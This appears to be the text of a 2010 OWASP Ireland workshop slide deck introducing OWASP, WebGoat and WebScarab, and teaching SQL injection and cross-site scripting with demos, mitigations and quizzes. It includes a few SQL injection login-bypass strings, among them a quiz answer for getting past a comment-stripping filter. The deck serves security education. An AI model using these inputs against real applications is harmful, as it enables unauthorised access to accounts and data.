1. Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org Practical advice for improving Application Security Fabio Cerullo / Eoin Keary OWASP Ireland fcerullo@owasp.org eoin.keary@owasp.org 25 th February 2010

2. OWASP 2 Today’s Agenda  Presentation : “Practical advice for improving Application Security”  Introduction to OWASP and OWASP Top Ten  Demonstration video of typical web based attacks with high level explanation  Live SQL injection demo using WebGoat & WebScarab  Live Cross Site Scripting demo using WebGoat & WebScarab  Coffee Break  Presentation: “The problems we are faced with”  The Application Security Verification Standard  SDLC & Security Assurance Maturity Model  Code Review versus traditional Runtime Testing.  Q&A

3. OWASP 3 What is OWASP?  Open Web Application Security Project  Non-profit, volunteer driven organization  All members are volunteers  All work is donated by sponsors  Provide free resources to the community  Publications, Articles, Standards  Testing and Training Software  Local Chapters & Mailing Lists  Supported through sponsorships  Corporate support through financial or project sponsorship  Personal sponsorships from members

4. OWASP 4 What does OWASP provide?  Publications  OWASP Top 10  OWASP Development Guide  OWASP Testing Guide  OWASP Code Review Guide  OWASP Application Security Verification Standard  etc  Software  WebGoat  WebScarab  ESAPI  Live CD  etc  Local Chapters  Community Orientation  OWASP Irish Chapter (~180 mailing-list users)

5. OWASP 5 OWASP Ireland RoadMap 2010  New Board  Fabio Cerullo – President (fcerullo@owasp.org)fcerullo@owasp.org  Information Security Specialist at AIB  OWASP Global Education Committee  OWASP Internationalization Promoter  Eoin Keary – Vice President (eoin.keary@owasp.org)eoin.keary@owasp.org  Senior Manager A&P/Risk at EY EMEIA  OWASP Code Review Guide Lead  OWASP Ireland Chapter Founder  OWASP Global Board Member  Rahim Jina – Secretary (rahim.jina@owasp.org)rahim.jina@owasp.org  Security Consultant at EY EMEA  OWASP Code Review Guide Reviewer  OWASP SAMM Project Contributor

6. OWASP 6 OWASP Ireland RoadMap 2010  New Initiatives  Engage with local industry (eg. Sage Ireland, IISF)  Engage with local universities (TCD, UCD, DCU)  Monthly meet-ups to network among peers.  Call for Presentations 2010.  Call for Local Chapter/Meet-ups Sponsors.  Invite international speakers.  OWASP AppSec Ireland  International conference on 3 rd September 2010 @ TCD.  Training/Presentation opportunities.  Sponsorship opportunities.  Web App CTF  Irish Information Security Event  Local conference around May 2010 (TBC)  Joint effort between OWASP Ireland, ISSA, IISF, ISACA, IRISS

7. OWASP 7 OWASP Top 10  The goal of the Top 10 project is to raise awareness about application security.  Most Critical Web Application Security Risks.  The Top 10 provides basic methods to protect against these high risk problem areas – and provides guidance on where to go from here.  Referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more.  The OWASP Top 10 was initially released in 2003 and updates were made in 2004, 2007, and 2010 release.

8. OWASP 8 OWASP Top 10 2010 – Release candidate http://www.owasp.org/index.php/OWASP_Top_Ten_Project

9. OWASP 9 Tools being used in this workshop  OWASP Webscarab  OWASP Webgoat  OWASP Live CD

10. OWASP 10 Webscarab  WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols.  It is written in Java, and is thus portable to many platforms.  WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.

11. OWASP 11 WebGoat -WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application.

12. OWASP 12 How everything fits together? Web Browser WebScarab Port:8008 WebGoat Port: 80

13. OWASP 13 Injection Flaws

14. OWASP 14 Injection Flaws  Code injection is the exploitation of a computer bug that is caused by processing invalid data.  Code injection can be used by an attacker to "inject" code into a computer program to change the course of execution.  SQL Injection is the most prevalent vulnerability in the wild.  Code injection affects web scripting languages, SOAP, Xpath, email, LDAP, and O/S.

15. OWASP 15 Code Injection  Any useful web application will receive user-data, manipulate it, and acted upon by an interpreter.  The code processed by the interpreter is a mix of: instructions by developer & user-supplied data.  Eg. SELECT * FROM USERS WHERE ACCOUNT=‘“+accountid+”’”  An attacker can supply crafted input.  Eg. SELECT * FROM USERS WHERE ACCOUNT=‘”+accountid+ OR ‘1’=‘1

16. OWASP 16 -First Order Attack: The attacker can simply enter a malicious string and cause the modified code to be executed immediately. -Second Order Attack: The attacker injects into persistent storage (such as a table row) which is deemed as a trusted source. An attack is subsequently executed by another activity. Types of SQL Injection

17. OWASP 17 Injection Demo  SQL INJECTION VIDEO

18. OWASP 18 WebGoat Exercise: String SQL Injection

19. OWASP 19 WebGoat Exercise: Numeric SQL Injection

20. OWASP 20 Best Practices: How to avoid SQL Injection  Constrain and sanitize input data. Check for known good data by validating for type, length, format, and range.  Use an account that has restricted permissions in the database. Ideally, you should only grant execute permissions to selected stored procedures in the database and provide no direct table access.  Avoid disclosing database error information. In the event of database errors, make sure you do not disclose detailed error messages to the user.

21. OWASP 21 Best Practices: How to avoid SQL Injection  Use Escape Routines to Handle Special Input Characters. Escape routines add an escape character to characters that have special meaning to SQL Server, thereby making them harmless.  Connection Strings. Encrypting connection string and credentials in configuration files and protecting them with strict ACL’s should be the norm.  OWASP ESAPI (Validator, Encoder)  OWASP SQL Injection Cheat Sheet

22. OWASP 22 Injection Flaws: Knowledge Quiz You have found a SQL injection vulnerability in a login function, and you try to use the input ‘ or 1=1-- to bypass the login. Your attack fails and the resulting error message indicates that the - - characters are being stripped by the application’s input filters. How could you circumvent this problem?

23. OWASP 23 Injection Flaws: Knowledge Quiz An easy way to achieve the same effect without using comment characters is with the input ' or 'a'='a

24. OWASP 24 Cross Site Scripting (XSS)

25. OWASP 25 XSS  Cross-site scripting (XSS) is a security vulnerability of dynamic Web pages generated from information supplied to the web server and replayed as part of the response to the browser.  Could be used to steal session cookies, application data, etc.  Two Types: Stored & Reflected XSS  Also variants: CSRF, XST

26. OWASP 26 XSS Example

27. OWASP 27 XSS Vulnerability  Common vulnerabilities that make your Web application susceptible to cross-site scripting attacks include:  Failing to constrain and validate input (Attacker)  Failing to encode output (Server Response)  Trusting data retrieved from a shared database  Typical scenario:  Attacker provides malicious user input (link/url)  Website sends response to user (why not?)  User executes malicious script unknowingly.

28. OWASP 28 XSS Types  Stored XSS Malicious input is stored on site and displayed at some later time…

29. OWASP 29 WebGoat Exercise: Stored XSS

30. OWASP 30 XSS Types  Reflected XSS  Malicious input is immediately sent back to user that submitted it.  Attacker crafts mail (or website) with malicious link to a vulnerable site  Victim reads mail/visit website executing unknowingly the malicious script.  Vulnerable site takes the script and generates a page containing it.  Victim discloses information.

31. OWASP 31 WebGoat Exercise: Reflected XSS

32. OWASP 32 XSS Real World Example May 2009  McAfee site is vulnerable to XSS Script  Researcher publishes paper on how to exploit vulnerability  NYTimes copy&paste the research paper (including source code)  NYTimes is NOW vulnerable to XSS Script

33. OWASP 33 WebGoat Exercise: Phishing with XSS

34. OWASP 34 XSS Demo  BEEF FRAMEWORK VIDEO

35. OWASP 35 XSS Best Practices  Positive Input Validation  HttpOnly Cookie Option  Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly  Anti-XSS tools for.NET/JAVA  AntiXSSLibrary.HtmlEncode(string)  AntiXSSLibrary.URLEncode(string)  Output Encoding  OWASP ESAPI (Validator, Encoder)  OWASP XSS Cheat Sheet

36. OWASP 36 XSS: Knowledge Quiz You are testing a web mail application that handles file attachments and displays them in the browser. What common vulnerability should you immediately check for?

37. OWASP 37 XSS: Knowledge Quiz If the application displays HTML or text files without any sanitization, then JavaScript contained within these will execute within the browser of any user.

38. OWASP 38 Thank you!